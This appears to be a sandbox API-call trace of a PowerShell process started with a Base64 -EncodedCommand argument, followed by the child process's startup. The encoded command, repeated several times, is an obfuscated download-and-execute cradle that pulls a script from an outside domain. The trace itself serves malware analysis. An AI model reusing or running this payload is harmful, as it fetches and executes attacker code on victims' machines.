	[0603.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.254] SetErrorMode (uMode=0x1) returned 0x1
	[0603.254] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.254] SetErrorMode (uMode=0x1) returned 0x1
	[0603.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.255] SetErrorMode (uMode=0x1) returned 0x1
	[0604.534] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.535] SetErrorMode (uMode=0x1) returned 0x1
	[0604.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0604.535] SetErrorMode (uMode=0x1) returned 0x1
	[0604.535] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.535] SetErrorMode (uMode=0x1) returned 0x1
	[0604.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0604.536] SetErrorMode (uMode=0x1) returned 0x1
	[0604.536] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.536] SetErrorMode (uMode=0x1) returned 0x1
	[0604.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0604.536] SetErrorMode (uMode=0x1) returned 0x1
	[0604.536] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.537] SetErrorMode (uMode=0x1) returned 0x1
	[0604.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0604.537] SetErrorMode (uMode=0x1) returned 0x1
	[0604.537] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.537] SetErrorMode (uMode=0x1) returned 0x1
	[0604.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0604.538] SetErrorMode (uMode=0x1) returned 0x1
	[0604.538] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x3a3350
	[0604.539] FindNextFileW (in: hFindFile=0x3a3350, lpFindFileData=0x1c84da70 | out: lpFindFileData=0x1c84da70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0604.539] FindClose (in: hFindFile=0x3a3350 | out: hFindFile=0x3a3350) returned 1
	[0604.539] SetErrorMode (uMode=0x1) returned 0x1
	[0604.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c84db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0604.540] SetErrorMode (uMode=0x1) returned 0x1
	[0604.541] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c84dd90 | out: lpFileInformation=0x1c84dd90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0604.541] SetErrorMode (uMode=0x1) returned 0x1
	[0604.542] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0604.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.542] CoTaskMemFree (pv=0x3e3240) 
	[0604.544] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0604.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.544] CoTaskMemFree (pv=0x3e3240) 
	[0604.547] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0604.547] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.547] CoTaskMemFree (pv=0x3e3240) 
	[0604.557] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0604.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.557] CoTaskMemFree (pv=0x3e3240) 
	[0604.571] CoTaskMemAlloc (cb=0x3b) returned 0x1b7d35f0
	[0604.571] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c84df78, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c84df78) returned 0x4550
	[0605.640] CoTaskMemFree (pv=0x1b7d35f0) 
	[0605.643] GetConsoleWindow () returned 0x10368
	[0605.666] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0605.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.666] CoTaskMemFree (pv=0x3e3240) 
	[0605.667] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0605.667] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0605.667] CoTaskMemFree (pv=0x3e3240) 
	[0606.661] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0606.661] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0606.661] CoTaskMemFree (pv=0x3e3240) 
	[0606.664] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c84dfc0 | out: pNumArgs=0x1c84dfc0) returned 0x1b7e4a30*=""
	[0606.665] lstrlenW (lpString="-EncodedCommand") returned 15
	[0606.666] CoTaskMemAlloc (cb=0x22) returned 0x1b7babd0
	[0606.666] RtlMoveMemory (in: Destination=0x1b7babd0, Source=0x1b7e4a52, Length=0x20 | out: Destination=0x1b7babd0) 
	[0606.666] CoTaskMemFree (pv=0x1b7babd0) 
	[0606.666] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0606.666] CoTaskMemAlloc (cb=0x2f4) returned 0x371da0
	[0606.666] RtlMoveMemory (in: Destination=0x371da0, Source=0x1b7e4a72, Length=0x2f2 | out: Destination=0x371da0) 
	[0606.666] CoTaskMemFree (pv=0x371da0) 
	[0606.675] LocalFree (hMem=0x1b7e4a30) returned 0x0
	[0606.676] CoTaskMemAlloc (cb=0x804) returned 0x36dfb0
	[0606.676] GetConsoleTitleW (in: lpConsoleTitle=0x36dfb0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0606.677] CoTaskMemFree (pv=0x36dfb0) 
	[0607.694] CoTaskMemAlloc (cb=0x38e) returned 0x1b7e4a30
	[0607.694] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c84df20*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2d1e2f8 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2d1e2f8*(hProcess=0x35c, hThread=0x344, dwProcessId=0x19c4, dwThreadId=0x19c0)) returned 1
	[0607.764] CoTaskMemFree (pv=0x1b7e4a30) 
	[0607.765] CloseHandle (hObject=0x344) returned 1
	[0607.766] CoTaskMemAlloc (cb=0x3b) returned 0x3fb530
	[0607.766] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c84dfc8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c84dfc8) returned 0x4550
	[0607.766] CoTaskMemFree (pv=0x3fb530) 
	[0607.769] GetCurrentProcess () returned 0xffffffffffffffff
	[0607.769] GetCurrentProcess () returned 0xffffffffffffffff
	[0607.770] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x35c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c84e0a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c84e0a8*=0x344) returned 1

Process:
	id = "45"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1393000"
	os_pid = "0xd90"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 265
	os_tid = 0xd94

	[0828.599] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0836.031] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0836.032] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0836.032] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0836.032] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0920.465] sprintf_s (in: _DstBuf=0x14edf8, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0942.870] GetVersionExW (in: lpVersionInformation=0x14d900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0942.871] GetVersionExW (in: lpVersionInformation=0x14d900*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d900*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0942.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.883] GetVersionExW (in: lpVersionInformation=0x14d670*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d670*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0942.884] SetErrorMode (uMode=0x1) returned 0x1
	[0942.885] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14d7d0 | out: lpFileInformation=0x14d7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0942.886] SetErrorMode (uMode=0x1) returned 0x1
	[0942.889] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14da40 | out: lpdwHandle=0x14da40) returned 0x94c
	[0943.306] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ce72f0 | out: lpData=0x2ce72f0) returned 1
	[0943.311] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14d9b8, puLen=0x14d9b0 | out: lplpBuffer=0x14d9b8*=0x2ce738c, puLen=0x14d9b0) returned 1
	[0943.314] lstrlenW (lpString="䅁") returned 1
	[0943.322] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14d928, puLen=0x14d920 | out: lplpBuffer=0x14d928*=0x2ce7468, puLen=0x14d920) returned 1
	[0943.323] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0943.325] CoTaskMemAlloc (cb=0x2e) returned 0x245fe0
	[0943.325] lstrcpyW (in: lpString1=0x245fe0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0943.327] CoTaskMemFree (pv=0x245fe0) 
	[0943.327] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14d928, puLen=0x14d920 | out: lplpBuffer=0x14d928*=0x2ce74bc, puLen=0x14d920) returned 1
	[0943.327] lstrlenW (lpString="System.Management.Automation") returned 28
	[0943.327] CoTaskMemAlloc (cb=0x3c) returned 0x1b9cc0
	[0943.327] lstrcpyW (in: lpString1=0x1b9cc0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0943.327] CoTaskMemFree (pv=0x1b9cc0) 
	[0943.327] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14d928, puLen=0x14d920 | out: lplpBuffer=0x14d928*=0x2ce7518, puLen=0x14d920) returned 1
	[0943.327] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0943.327] CoTaskMemAlloc (cb=0x20) returned 0x287e60
	[0943.327] lstrcpyW (in: lpString1=0x287e60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0943.327] CoTaskMemFree (pv=0x287e60) 
	[0943.327] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14d928, puLen=0x14d920 | out: lplpBuffer=0x14d928*=0x2ce7558, puLen=0x14d920) returned 1
	[0943.327] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0943.327] CoTaskMemAlloc (cb=0x44) returned 0x1b9cc0
	[0943.327] lstrcpyW (in: lpString1=0x1b9cc0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0943.327] CoTaskMemFree (pv=0x1b9cc0) 
	[0943.327] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14d928, puLen=0x14d920 | out: lplpBuffer=0x14d928*=0x2ce75c0, puLen=0x14d920) returned 1
	[0943.327] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0943.327] CoTaskMemAlloc (cb=0x76) returned 0x21f0d0
	[0943.327] lstrcpyW (in: lpString1=0x21f0d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0943.327] CoTaskMemFree (pv=0x21f0d0) 
	[0943.327] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14d928, puLen=0x14d920 | out: lplpBuffer=0x14d928*=0x2ce765c, puLen=0x14d920) returned 1
	[0943.327] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0943.327] CoTaskMemAlloc (cb=0x44) returned 0x1b9cc0
	[0943.327] lstrcpyW (in: lpString1=0x1b9cc0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0943.327] CoTaskMemFree (pv=0x1b9cc0) 
	[0943.327] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14d928, puLen=0x14d920 | out: lplpBuffer=0x14d928*=0x2ce76c0, puLen=0x14d920) returned 1
	[0943.327] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0943.327] CoTaskMemAlloc (cb=0x58) returned 0x24a4d0
	[0943.327] lstrcpyW (in: lpString1=0x24a4d0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0943.328] CoTaskMemFree (pv=0x24a4d0) 
	[0943.328] VerQueryValueW (in: pBlock=0x2ce72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14d928, puLen=0x14d920 | out: lplpBuffer=0x14d928*=0x2ce773c, puLen=0x14d920) returned 1
	[0943.328] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0943.328] CoTaskMemAlloc (cb=0x20) returned 0x287e60
	[0943.328] lstrcpyW (in: lpString1=0x287e60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
